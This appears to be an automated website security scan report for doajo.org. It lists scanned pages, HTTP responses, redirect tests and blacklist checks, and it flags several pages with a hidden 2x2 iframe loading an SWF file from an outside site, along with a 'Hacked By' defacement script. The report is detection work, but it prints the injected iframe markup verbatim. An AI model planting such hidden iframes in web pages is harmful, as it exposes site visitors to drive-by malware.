Scanned pages/files
| Request | Server response | Status |
http://doajo.org/ | 200 OK Content-Length: 15416 Content-Type: text/html | clean |
http://doajo.org/queries.php | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Mon, 15 Sep 2014 22:19:31 GMT Pragma: no-cache Location: dologin.php Server: Apache/2.2.15 (CentOS) Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=nm20kgld8drrf4eucb4r2o1go6; path=/ X-Powered-By: PHP/5.3.3 | clean |
http://doajo.org/dologin.php | 200 OK Content-Length: 11973 Content-Type: text/html | clean |
http://doajo.org/index.php | 200 OK Content-Length: 15416 Content-Type: text/html | clean |
http://doajo.org/pharmas.php | 200 OK Content-Length: 10498 Content-Type: text/html | clean |
http://doajo.org/page.php?ID=4 | 200 OK Content-Length: 13222 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://hotelakanksha.com/img/hunter_gujjar-pca.swf <iframe width='2' height='2' scrolling='no' frameborder='no' src='http://hotelakanksha.com/img/hunter_gujjar-pca.swf'> Deface/Content modification. The following signature was found: Hacked By Cyber_Ps|:::| <script language="JavaScript">
var brzinakucanja = 200; var pauzapor = 2000; var vremeid = null; var kretanje = false; var poruka = new Array(); var slporuka = 0; var bezporuke = 0; poruka[0] = "|:::|_ Hacked By Cyber_Ps|:::|" function prikaz() { var text = poruka[slporuka]; if (bezporuke < text.length) { if (text.charAt(bezporuke) == " ") bezporuke++ var ttporuka = text.substring(0, bezporuke + 1); document.title = ttporuka; bezporuke++ vremeid = setTimeout("prikaz()", brzinakucanja); kretanje = true; } else { bezporuke = 0; slporuka++ if (slporuka == poruka.lengt ...[16769 bytes skipped]... | ||
http://edge.quantserve.com/quant.js | 200 OK Content-Length: 7874 Content-Type: application/x-javascript | clean |
http://doajo.org/test404page.js | 404 Not Found Content-Length: 287 Content-Type: text/html | clean |
http://doajo.org/links.php | 200 OK Content-Length: 25738 Content-Type: text/html | clean |
http://doajo.org/downloads.php | 200 OK Content-Length: 13222 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://hotelakanksha.com/img/hunter_gujjar-pca.swf <iframe width='2' height='2' scrolling='no' frameborder='no' src='http://hotelakanksha.com/img/hunter_gujjar-pca.swf'> | ||
http://doajo.org/allnews.php | 200 OK Content-Length: 13222 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://hotelakanksha.com/img/hunter_gujjar-pca.swf <iframe width='2' height='2' scrolling='no' frameborder='no' src='http://hotelakanksha.com/img/hunter_gujjar-pca.swf'> | ||
http://doajo.org/allevents.php | 200 OK Content-Length: 14523 Content-Type: text/html | clean |
http://doajo.org/eventShow.php?ID=17 | 200 OK Content-Length: 14685 Content-Type: text/html | clean |
http://doajo.org/orange.php | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Mon, 15 Sep 2014 22:19:35 GMT Pragma: no-cache Location: dologin.php Server: Apache/2.2.15 (CentOS) Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=un9d8m0m436orduq9t3tlo1cg1; path=/ X-Powered-By: PHP/5.3.3 | clean |
http://doajo.org/contact.php | 200 OK Content-Length: 13222 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://hotelakanksha.com/img/hunter_gujjar-pca.swf <iframe width='2' height='2' scrolling='no' frameborder='no' src='http://hotelakanksha.com/img/hunter_gujjar-pca.swf'> | ||
http://doajo.org/eventShow.php?ID=16 | 200 OK Content-Length: 15178 Content-Type: text/html | clean |
http://doajo.org/eventShow.php?ID=14 | 200 OK Content-Length: 14296 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: doajo.org
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 15 Sep 2014 22:19:31 GMT
Pragma: no-cache
Server: Apache/2.2.15 (CentOS)
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=4vofnmm7r391su5e3gc1shuli1; path=/
X-Powered-By: PHP/5.3.3
GET / HTTP/1.1
Host: doajo.org
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 15 Sep 2014 22:19:31 GMT
Pragma: no-cache
Server: Apache/2.2.15 (CentOS)
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=4vofnmm7r391su5e3gc1shuli1; path=/
X-Powered-By: PHP/5.3.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: doajo.org
Referer: http://www.google.com/search?q=doajo.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: doajo.org
Referer: http://www.google.com/search?q=doajo.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=doajo.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://doajo.org/
Result: doajo.org is not infected or malware details are not published yet.
Result: doajo.org is not infected or malware details are not published yet.